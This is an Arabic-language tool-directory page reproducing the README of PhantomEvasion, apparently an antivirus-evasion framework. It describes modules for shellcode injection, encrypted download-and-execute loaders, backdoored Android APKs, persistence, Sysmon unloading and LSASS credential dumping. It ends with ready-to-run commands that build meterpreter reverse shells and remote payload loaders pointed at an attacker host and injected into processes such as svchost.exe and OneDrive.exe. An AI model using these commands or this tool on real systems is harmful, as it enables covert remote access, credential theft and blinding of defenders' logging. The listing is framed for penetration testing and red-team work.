Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/esskumar/phantomevasion
تصعيد الامتيازاتأطر الاستغلالتوليد الحمولةآليات الاستمراريةشيل كودما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubesskumar/phantomevasion

PhantomEvasion

أداة لتجنب برامج مكافحة الفيروسات مبنية على بايثون، تولّد ملفات تنفيذية غير قابلة للكشف من حمولات msfvenom باستخدام تقنيات متقدمة مثل حقن التعليمات البرمجية غير المرغوب فيها، التشفير، انتحال الشهادات، وطرق تنفيذ متعددة.

عرض المستودع
1717منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

فينوم إيفيجن 3.0

Phantom-Evasion هي أداة لتجاوز برامج مكافحة الفيروسات مكتوبة بلغة بايثون (متوافقة مع كل من python و python3) قادرة على إنشاء ملفات تنفيذية (تقريبًا) غير قابلة للاكتشاف حتى مع أشهر حمولات msfvenom لـ x86.

أنظمة التشغيل التالية تدعم الإعداد التلقائي رسميًا:

  1. Kali Linux
  2. Parrot Security

أنظمة التشغيل التالية تدعم الإعداد التلقائي على الأرجح ولكنها تتطلب تثبيت metasploit-framework يدويًا:

  1. OSX (تم اختباره على Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. توزيعات Debian الأخرى
  7. Centos
  8. Fedora
  9. Blackarch

أنظمة التشغيل التالية تتطلب إعدادًا يدويًا:

  1. Windows 10

ببساطة قم بعمل git clone أو قم بتنزيل وفك ضغط مجلد Phantom-Evasion.

الإعداد:

الإعداد التلقائي، افتح طرفية وقم بتنفيذ:

root@kitploit:~
python3 phantom-evasion.py --setup

أو:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

أو ابدأ phantom-evasion في الوضع التفاعلي واختر الخيار 7.

الاعتمادات (للإعداد اليدوي فقط)

  1. metasploit-framework
  2. mingw-w64 (cygwin على windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

وضع سطر الأوامر / التفاعلي:

  1. قم بتشغيل phantom-evasion في الوضع التفاعلي:
root@kitploit:~
python3 phantom-evasion.py

أو:

root@kitploit:~
./phantom-evasion.py
  1. بخلاف ذلك، لعرض خيارات وضع سطر الأوامر:
root@kitploit:~
python3 phantom-evasion.py --help

أو:

root@kitploit:~
./phantom-evasion.py --help

وحدات ويندوز

  • كل وحدة حمولة ويندوز بلغة C يمكن ترجمتها (تدعم كلاً من x86 و x64) كملف EXE أو DLL/ReflectiveDLL.

  • حقن كود غير مفيد عشوائي (يمكن ضبط الشدة والتكرار واحتمالية إعادة الحقن) وتقنيات تجاوز مكافحة الفيروسات لويندوز (يمكن ضبط التكرار).

  • تشفير متعدد البايتات (Xor/Vigenere) للشفرة/الملف مدعوم في كل من وحدات حقن الشفرة وتنزيل وتنفيذ.

  • تقنية Ntdll unhookapi و Peb process masquerading مدعومة.

  • نطاق واسع من طرق التنفيذ مدعوم (محلي وعن بُعد).

  • نطاق واسع من طرق تخصيص الذاكرة للحمولة (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

  • التحميل الديناميكي لواجهات برمجة تطبيقات ويندوز يمكن ضبطه.

  • مزور التوقيعات والمُوقع مدعوم.

  • إزالة الملف التنفيذي (https://en.wikipedia.org/wiki/Strip_(Unix))

حقن الشفرة بلغة C لويندوز

حمولات msfvenom لويندوز والشفرة المخصصة مدعومة. يمكن تخزين الشفرة كمورد واسترجاعها في وقت التشغيل باستخدام FindResource API.

تشفير الشفرة مدعوم:

root@kitploit:~
1. لا شيء

2. متعدد البايتات Xor

3. متعدد البايتات Xor بمفتاح مزدوج

4. Vigenere

5. Vigenere بمفتاح مزدوج
  1. طريقة التنفيذ المحلية يمكن أن تكون إحدى التالية:

    Thread

    APC

    وضع تخصيص الذاكرة المحلي يمكن أن يكون إحدى التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. طريقة التنفيذ عن بُعد يمكن أن تكون إحدى التالية:

    ThreadExecutionHijack (اختصارها TEH)

    Processinject (اختصارها PI)

    APCSpray (اختصارها APCS)

    EarlyBird (اختصارها EB)

    EntryPointHijack (اختصارها EPH)

    وضع تخصيص الذاكرة عن بُعد يمكن أن يكون إحدى التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

مرحلة المعالج (stager) بلغة C النقية لويندوز (C)

وحدات مرحلة المعالج بلغة C النقية (TCP/HTTP/HTTPS) متوافقة مع msfconsole و Cobalt Strike beacon. (reverse_tcp/reverse_http/reverse_https)

باستخدام وضع سطر الأوامر:

root@kitploit:~
reverse_tcp c stager هو WRT

reverse_http c stager هو WRH

reverse_https c stager هو WRS
  1. طريقة التنفيذ المحلية يمكن أن تكون إحدى التالية:

    Thread

    APC

    وضع تخصيص الذاكرة المحلي يمكن أن يكون إحدى التالية:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

ويندوز - تنزيل وتنفيذ بدون كتابة على القرص (NoDiskWrite)

تنزيل exe/dll من عنوان URL المقدم في الذاكرة وتنفيذ/تحميله في عملية عن بُعد (بدون كتابة على القرص).

تنزيل مشفر لـ EXE/DLL مدعوم:

root@kitploit:~
1. لا شيء
                                 
2. متعدد البايتات Xor
                                 
3. متعدد البايتات Xor بمفتاح مزدوج
                               
4. Vigenere
                                
5. Vigenere بمفتاح مزدوج

سيتم حفظ DLL/EXE المشفر كاسم الملف الأصلي + "crypt" + ".dll" أو ".exe" وهو الذي سيتم تنزيله.

  1. ويندوز - تنزيل وتنفيذ EXE بدون كتابة على القرص (WDE باستخدام وضع سطر الأوامر):

    طريقة التنفيذ عن بُعد يمكن أن تكون إحدى التالية:

    ProcessHollowing (اختصارها PH)

  2. ويندوز - تنزيل وتنفيذ DLL بدون كتابة على القرص (WDD باستخدام وضع سطر الأوامر):

    طريقة التحميل عن بُعد يمكن أن تكون إحدى التالية:

    ReflectiveDll (اختصارها RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (اختصارها MM) ---> فقط x86

حمولات لينكس

وحدة حقن الشفرة للينكس (C)

حمولات msfvenom للينكس والشفرة المخصصة مدعومة.

حمولات أندرويد

  1. أندرويد - باب خلفي مشفر لـ Msfvenom (Obfuscate Backdoor):

    تشفير حمولات msfvenom وإعادة بنائها (smali/baksmali) باستخدام apktool. يمكن استخدام الحمولة المشفرة لبث ملفات apk العادية.

وحدات الثبات (Persistence)

  1. ويندوز - ثبات عبر RegCreateKeyExW - إضافة مفتاح التسجيل (C) يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله مع تحديد المسار الكامل للملف المراد إضافته للتشغيل التلقائي كمعامل.

  2. ويندوز - ثبات عبر REG - إضافة مفتاح التسجيل (CMD) تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (إضافة مفتاح تسجيل عبر REG.exe).

  3. ويندوز - ثبات عبر إبقاء العملية حية (C) يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله. يستخدم CreateToolSnapshoot و ProcessFirst و ProcessNext للتحقق مما إذا كانت العملية المحددة حية كل X ثانية (وإذا لم تكن، يتم إنشاء عملية جديدة باستخدام WinExec API).

  4. ويندوز - ثبات عبر Schtasks (CMD)

    تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (باستخدام Schtasks.exe).

  5. ويندوز - ثبات عبر إنشاء خدمة (CMD)

    تقوم هذه الوحدة بإنشاء حمولات سطر أوامر للثبات (باستخدام sc.exe).

وحدات رفع الامتيازات (Privilege Escalation)

  1. ويندوز - DuplicateTokenEx (C)

    إنشاء عملية جديدة برمز منسوخ من عملية أخرى. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله.

وحدات ما بعد الاستغلال (Postexploitation)

  1. ويندوز - إلغاء تحميل Sysmon (C) إلغاء تحميل برنامج تشغيل sysmon مما يتسبب في توقف النظام عن تسجيل سجلات أحداث sysmon. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله.

  2. ويندوز - إلغاء تحميل Sysmon (CMD) إلغاء تحميل برنامج تشغيل sysmon مما يتسبب في توقف النظام عن تسجيل سجلات أحداث sysmon.

  3. ويندوز - إخفاء ملف باستخدام Attrib (CMD) استخدام attrib لإخفاء ملف

  4. ويندوز - إخفاء ملف باستخدام SetFileAttribute (C) إخفاء ملف باستخدام SetFileAttribute API. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله.

  5. ويندوز - تفريغ Lsass (C) تفريغ Lsass باستخدام MiniWriteDumpWrite API. يجب رفع الملف التنفيذي المترجم إلى الجهاز الهدف وتشغيله.

  6. ويندوز - تفريغ Lsass (CMD)

    تفريغ Lsass من سطر الأوامر.

أمثلة على وضع سطر الأوامر في Phantom-Evasion:

  1. حقن شفرة ويندوز، إخراج exe موقع بشهادة https مزورة، طريقة التنفيذ المحلية: Thread، الذاكرة: Virtual_RWX، التشفير: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. حقن شفرة ويندوز x64، إخراج كـ reflective dll، طريقة التنفيذ عن بُعد: ProcessInject (PI)، الذاكرة: Virtual_RW/RX، العملية المستهدفة: SkypeApp.exe، التشفير: xor مزدوج المفتاح
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. حقن شفرة ويندوز x64، إخراج كـ dll بعد إزالتها، الشفرة مخزنة كمورد، طريقة التنفيذ عن بُعد: EarlyBird (EB)، الذاكرة: Virtual_RW/RX، العملية المستهدفة: svchost.exe، التشفير: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. ويندوز x64 stager عكسي https، إخراج كـ dll بعد إزالتها، طريقة التنفيذ المحلية: Thread، الذاكرة: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. ويندوز x86 downloadexec dll، إخراج كـ exe بعد إزالته، طريقة التنفيذ عن بُعد: ManualMap (MM)، العملية المستهدفة: OneDrive.exe، حجم التحميل 1000000 بايت
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. ويندوز x64 downloadexec exe، إخراج كـ reflective dll بعد إزالتها، طريقة التنفيذ عن بُعد: ProcessHollowing (PH)، العملية المستهدفة: svchost.exe، حجم التحميل 1000000 بايت
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

الترخيص

GPLv3.0

الإسناد والموارد المفيدة

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

تنزيل الأداة